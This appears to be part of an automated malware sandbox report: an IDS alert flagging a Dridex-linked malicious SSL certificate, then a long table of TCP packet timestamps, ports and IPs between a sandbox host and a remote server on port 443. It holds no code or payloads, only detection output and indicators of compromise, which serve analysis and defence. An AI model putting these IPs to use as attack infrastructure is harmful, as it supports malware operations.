01/12/21-07:45:43.737164	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49410	5.100.228.233	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2021 07:43:27.240169048 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:27.321654081 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:27.321736097 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:27.331224918 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:27.412463903 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:27.414689064 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:27.414797068 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:27.414814949 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:27.414841890 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:27.414869070 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:27.414881945 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:27.427311897 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:27.508760929 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:27.508929968 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.154236078 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.241509914 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.241545916 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.241616011 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.241676092 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.241772890 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.241797924 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.241822004 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.241839886 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.241911888 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.241949081 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.242034912 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.242073059 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.242146969 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.242185116 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.242253065 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.242296934 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.242441893 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.242583990 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.244363070 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.323227882 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.323257923 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.323318005 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.323432922 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.323471069 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.323499918 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.323506117 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.323549032 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.323584080 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.323682070 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.323713064 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.323798895 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.323832989 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.323923111 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.323956966 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.324007988 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.324042082 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.324076891 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.324109077 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.324238062 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.324271917 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.324318886 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.324351072 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.324429989 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.324465036 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.324558020 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.324589968 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.324681997 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.324738979 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.324803114 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.324846029 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.324872971 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.324908018 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.325015068 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.325052977 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.325126886 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.325165033 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.325248957 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.325287104 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.325761080 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.404982090 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.405038118 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.405061960 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.405147076 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.405217886 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.405247927 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.405263901 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.405323029 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.405349970 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.405421019 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.405481100 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.405543089 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.405581951 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.405637026 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.405699968 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.405751944 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.405776978 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.405829906 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.405895948 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.405941010 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.406006098 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.406059980 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.406133890 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.406188011 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.406233072 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.406290054 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.406383038 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.406435013 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.406459093 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.406508923 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.406621933 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.406677008 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.406744957 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.406802893 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.406817913 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.406864882 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.406932116 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.406981945 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.407046080 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.407099009 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.407136917 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.407193899 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.407299995 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.407346964 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.407496929 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.407537937 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.407550097 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.407577991 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.407612085 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.407664061 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.407723904 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.407774925 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.407815933 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.407866001 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.407922983 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.407970905 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.408092976 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.408150911 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.408173084 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.408217907 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.408338070 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.408387899 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.408411026 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.408453941 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.408483028 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.408525944 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.408607960 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.408652067 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.408709049 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.408751965 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.408859968 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.408907890 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.408970118 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.409013033 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.409097910 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.409137964 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.409168959 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.409212112 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.410672903 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.486687899 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.486721039 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.486808062 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.486882925 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.486898899 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.486921072 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.486938000 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.487015009 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.487052917 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.487092018 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.487128973 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.487212896 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.487250090 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.487334013 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.487371922 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.487451077 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.487490892 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.487571955 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.487612009 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.487646103 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.487680912 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.487771034 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.487817049 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.487895966 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.487935066 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.488009930 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.488049984 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.488174915 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.488214016 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.488249063 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.488287926 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.488336086 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.488373995 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.488449097 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.488485098 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.488573074 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.488614082 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.488692045 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.488730907 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.488811970 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.488847971 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.488929987 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.488969088 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.489759922 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.492043018 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.492074966 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.492151976 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.492175102 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.492219925 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.492290020 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.492325068 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.492413044 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.492450953 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.492536068 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.492574930 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.492609978 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.492645979 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.492727041 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.492763996 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.492851973 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.492888927 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.492973089 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.493007898 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.493062973 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.493099928 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.493179083 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.493217945 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.493293047 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.493324995 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.493455887 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.493503094 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.493541002 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.493576050 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.493735075 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.493767977 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.493817091 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.493850946 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.493899107 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.493933916 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.494057894 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.494088888 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.494095087 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.494131088 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.494304895 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.494334936 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.494349957 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.494366884 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.494461060 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.494493008 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.494574070 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.494609118 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.494695902 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.494735003 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.494818926 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.494848967 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.495646954 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.568284988 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.568315983 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.568487883 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.568509102 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.568521976 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.568536997 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.568561077 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.568645954 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.568689108 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.568737030 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.568772078 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.568914890 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.568954945 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.568960905 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.568994045 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.569114923 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.569149971 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.569200993 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.569241047 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.570792913 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.570879936 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.570911884 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.570935011 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.571007967 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.571047068 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.571125031 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.571170092 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.571265936 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.571310043 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.571348906 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.571388006 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.571464062 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.571489096 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.571502924 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.571568966 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.571609974 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.571724892 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.571763992 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.571805000 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.571842909 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.571943998 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.571983099 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.572048903 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.572087049 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.573200941 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.573245049 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.573270082 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.573286057 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.573457956 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.573502064 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.573566914 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.573604107 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.573776960 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.573796988 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.573820114 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.573831081 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.573914051 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.573951960 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.573970079 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.574148893 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.574196100 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.574315071 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.574332952 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.574353933 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.574362993 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.574532986 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.574575901 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.574631929 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.574666023 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.576134920 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.576159954 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.576215982 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.576703072 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.576754093 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.576807022 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.576843977 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.576894999 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.576929092 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.577045918 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.577081919 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.577163935 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.577202082 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.577258110 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.577296019 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.577362061 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.577364922 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.577399015 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.577483892 CET	443	49167	217.174.149.3	192.168.2.22
